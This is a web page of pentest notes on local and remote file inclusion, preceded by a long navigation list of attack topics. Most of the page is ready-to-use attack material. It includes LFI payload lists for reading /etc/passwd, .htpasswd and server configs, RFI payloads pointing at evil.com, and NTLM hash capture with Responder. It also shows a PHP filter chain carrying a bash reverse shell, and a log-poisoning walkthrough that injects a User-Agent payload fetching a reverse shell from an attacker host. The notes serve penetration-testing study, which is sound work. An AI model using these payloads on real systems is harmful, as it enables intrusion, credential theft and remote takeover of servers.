Pentest Notes
Pentest Notes

Exploits related to Web

Method

HTTP Rate Limit Bypass
Virtual Hosts (VHOSTS) Enumeration
WAF (Web Application Firewall) Detection
Web Basic Pentesting
Web Content Discovery
Web Login Bypass

Security Risk

Blind XXE
Broken Access Control
Business Logic Attack
CORS (Cross-Origin Resource Sharing) Attack
CRLF (Carriage Return Line Feed) Injection
CSRF (Cross-Site Request Forgery)
Directory (Path) Traversal
File Inclusion (LFI/RFI)
File Upload Attack
HTTP Request Smuggling
IDOR (Insecure Direct Object References) Attack
Insecure Deserialization
JSON.NET Deserialization
NoSQL Injection
Node.js Deserialization Attack
OAuth Attack
OS Command Injection
Open Redirect
PHP Filters Chain
PHP Object Injection
Prototype Pollution in Client-Side
Prototype Pollution in Server-Side
Redis SSRF
SQL Injection Cheat Sheet
SQL Injection with Sqlmap
SSRF (Server-Side Request Forgery)
SSTI (Server-Side Template Injection)
XSS (Cross-Site Scripting)
XSS with Dynamic PDF
XST (Cross-Site Tracing)
XXE (XML External Entity)
wkhtmltopdf SSRF

Cookie

Cookie Hijacking
Session Fixation

CMS

Bolt CMS Pentesting
CMS (Content Management System) Pentesting
Cockpit CMS Pentesting
Concrete CMS Pentesting
FUEL CMS Pentesting
Joomla CMS Pentesting
Mara CMS Pentesting
Subrion CMS Pentesting
TYPO3 Pentesting
WordPress Pentesting

Framework

AJP (Apache JServ Protocol) Pentesting
Angular Pentesting
Apache Struts Pentesting
Django Pentesting
Flask Jinja2 Pentesting
Python Pickle RCE
Spring Cloud Function RCE
Spring Pentesting
Werkzeug Pentesting

Template Engine

JsRender Template Injection
Pug Pentesting

API

API Pentesting
GraphQL Pentesting

Cloud

AWS (Amazon Web Services) Pentesting
Spring Cloud Function RCE

Microsoft

Microsoft Exchange Server Pentesting

Tool

How to Use Burp Suite
How to Use OWASP ZAP

Others

Apache ActiveMQ Pentesting
Apache Tomcat Pentesting
Apache Zeppelin Pentesting
Atlassian Confluence Pentesting
Browser in the Browser (BITB) Attack
CGI Pentesting
Cacti Pentesting
ClipBucket Pentesting
Code Deobfuscation
Codiad Pentesting
Dompdf RCE
Dump Git Repository from Website
Grafana Pentesting
HashiCorp Consul Pentesting
JBOSS Pentesting
JWT (Json Web Token) Pentesting
Java RMI Pentesting
Jenkins Pentesting
LimeSurvey Pentesting
Log4j Pentesting
OpenCATS Pentesting
PHP Srand Time Abusing
PHP hash_hmac Bypass
Restaurant Management System (RMS) Pentesting
TeamCity Pentesting
Tiny File Manager Pentesting
Web Browser Settings for Pentesting
Web PHP Pentesting
WebAnno Pentesting
WebDAV Pentesting
WebSocket Pentesting
Webmin Pentesting

File Inclusion (LFI/RFI)

Last modified: 2023-05-17

Web

Local File Inclusion (LFI) and Remote File Inclusion (RFI) are vulnerabilities that are often found to affect web applications that rely on a scripting run time.

Local File Inclusion (LFI)

?page=../
?page=/etc/passwd
?page=../../../../etc/passwd
?page=../../../../../etc/passwd
?page=..//..//..//..//..//etc/passwd
?page=....//....//....//....//etc/passwd
?page=....//....//....//....//....//....//etc/passwd
?page=../../../../../../../../../../../../../../etc/passwd
?page=..\/..\/..\/..\/etc/passwd
?page=..%2F..%2F..%2F..%2Fetc/passwd
?page=..%5C..%5C..%5C..%5cetc/passwd
?page=..%252f..%252f..%252f..%252fetc/passwd
?page=/etc/passwd&
?page=/etc/passwd%00
?page=/etc/passwd%00.inc
?page=/etc/passwd%00.php
?page=http://localhost/index
?page=http:%5c%5cindex
?page=http:%252f%252findex
?page=somedir/../../../../etc/passwd&ext=

# File scheme
?page=file:///etc/passwd
?page=file:%2F%2F%2Fetc%2Fpasswd
?page=file:%252F%252F%252Fetc%252Fpasswd
?page=file%3A///etc/passwd
?page=file%3A%2F%2F%2Fetc%2Fpasswd
?page=file%3A%252F%252F%252Fetc%252Fpasswd
?page=file://var/www/html/index.php
?page=file://var/www/<subdomain>/index.php

# Host
?page=/etc/hosts
# Cron
?page=/etc/crontab

# Web root
?page=/var/www/html/index.html
?page=/var/www/html/index.php
?page=/var/www/example.com/index.php
?page=/var/www/sudomain/index.php
?page=/var/www/subdomain.example.com/index.php
?page=/var/www/wordpress/index.php

# Apache
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/apache2/sites-enabled/domain.conf
?page=/etc/apache2/sites-enabled/example.com.conf
?page=/etc/apache2/sites-enabled/sub.example.com.conf
?page=/etc/apache2/sites-enabled/sub.conf
?page=/etc/apache2/sites-available/domain.conf
?page=/etc/apache2/sites-available/example.com.conf
?page=/etc/apache2/sites-available/sub.example.com.conf
?page=/etc/apache2/sites-available/sub.conf
?page=/etc/apache2/.htpasswd
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log

# Nginx
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/etc/nginx/nginx.conf
?page=/etc/nginx/conf.d/.htpasswd
?page=/etc/nginx/conf.d/example.com.conf
?page=/etc/nginx/conf.d/example.conf
?page=/etc/nginx/conf.d/subdomain.example.com.conf
?page=/etc/nginx/conf.d/subdomain.conf
?page=/etc/nginx/sites-available/example.com.conf
?page=/etc/nginx/sites-enabled/example.com.conf
?page=/usr/local/nginx/conf/nginx.conf
?page=/usr/local/etc/nginx/nginx.conf

# PHP web conf
?page=/etc/php/x.x/apache2/php.ini
?page=/etc/php/x.x/cli/php.ini
?page=/etc/php/x.x/fpm/php.ini

# BIND
?page=/etc/bind/named.conf
?page=/etc/bind/named.conf.options
?page=/etc/bind/named.conf.local
?page=/etc/bind/named.conf.default-zones

# PHP Filter
?page=php://filter/resource=/etc/passwd
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://filter/convert.base64-encode/resource=index.php
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
?page=data://text/plain,<?php echo base64_encode(file_get_contents(“index.php”)); ?>

# Windows
?page=../../../../../../../../windows/system32/drivers/etc/hosts
?page=C:/Windows/System32/drivers/etc/hosts
?page=C:/Users/Public/Desktop/desktop.ini
?page=C:/Users/FUZZ/Desktop/desktop.ini # user enumeration
?page=C:/inetpub/wwwroot/
?page=C:/xampp/apache/conf/httpd.conf
?page=C:/xampp/apache/conf/extra/httpd-userdir.conf
?page=C:/xampp/apache/conf/extra/httpd-vhosts.conf
?page=C:/xampp/apache/conf/extra/httpd-xampp.conf
?page=C:/xampp/apache/conf/extra/httpd-ajp.conf
?page=C:/xampp/apache/logs/access.log
?page=C:/xampp/apache/logs/error.log
?page=C:/xampp/cgi-bin/example.cgi
?page=C:/xampp/htdocs/example.com/index.php
?page=C:/xampp/htdocs/sub.example.com/index.php
?page=C:/xampp/phpMyAdmin/index.php
?page=C:/xampp/phpMyAdmin/config.inc.php

Automation

ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

Read Process Commands

We can retrieve commands that start processes by enumerating /proc/PID/cmdline.
Create a Python script that enumerates them. We can refer to this blog post’s "This leaves the server vulnerable to Local File Inclusion." section.

# lfi.py
import requests
import time

for i in range(10):
    print(f"[+] Trying {i}")
    url = "http://example.com/?file=/proc/" + i + "/cmdline"
    resp = requests.get(url)
    print(resp.content)
    time.sleep(1)

Then execute this file.

python3 lfi.py

Remote File Inclusion (RFI)

?page=//evil.com/exploit
?page=%2F%2fevil.com/exploit
?page=%2C%2Cevil.com/exploit
?page=http://evil.com/exploit
?page=http%3A//evil.com/exploit
?page=http%3A%2F%2Fevil%2Ecom/exploit
?page=http%253A%252F%252Fevil%252Ecom/
?page=test@sub.example.com/

Steal NTLM Hashes (Windows)

If the website is hosted on Windows, we may be able to retrieve password hashes using Responder.
In local machine, start responder.

# -I: Interface e.g. eth0, tun0, etc.
sudo responder -I tun0

Then send request to https://example.com/?page=//<local-ip>/test.
Now we may be able to capture the hashes.
If so, we can crack it using JohnTheRipper or Hashcat. Please refer to this page for cracking NTLM.


Remote Code Execution (RCE)

php_filter_chain_generator is CLI that generates payload for PHP filter bypass and allow us to RCE.
Below is the payload for reverse shell.

wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py
python3 php_filter_chain_generator.py --chain "<?php system('bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\"')?>"

Then copy the output and paste it to the target.


Log Poisoning

1. Check if You Can Access the Apache Log File

# Debian, Ubuntu Linux
/?page=/var/log/apache/access.log
/?page=../../../../var/log/apache/access.log
/?page=/var/log/apache2/access.log
/?page=../../../../var/log/apache2/access.log

# FreeBSD Linux
/?page=/var/log/httpd-access.log
/?page=../../../../var/log/httpd-access.log

# CentOS, Fedora, RedHat Linux
/?page=/var/log/httpd/access_log
/?page=../../../../var/log/httpd/access_log

2. Prepare the Payload for PHP Reverse Shell

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

# Edit the values in the payload
$ip = '<attacker-ip>';
$port = 4444;

3. Open Web Server in Local Machine

python -m http.server 80

4. Inject PHP Payload in the User-Agent

Send the GET Request with abusing the User-Agent.
The payload can be uploaded to the /shell.php of the target website.

GET / HTTP/1.1
...
User-Agent: <?php file_put_contents('shell.php', file_get_contents('http://<attacker-ip>/shell.php'));  ?>

5. Apply the Injection

Refresh the page /index.php?page=../../../../var/log/apache2/access.log .

6. Open Listener for Reverse Shell

In you local machine, open the listener.
You need to specify the port which you set the section 2.

nc -lvnp 4444

7. Gain Access to Shell

Access to /shell.php of the target website.
If it goes well, you can get a shell.

Twitter GitHub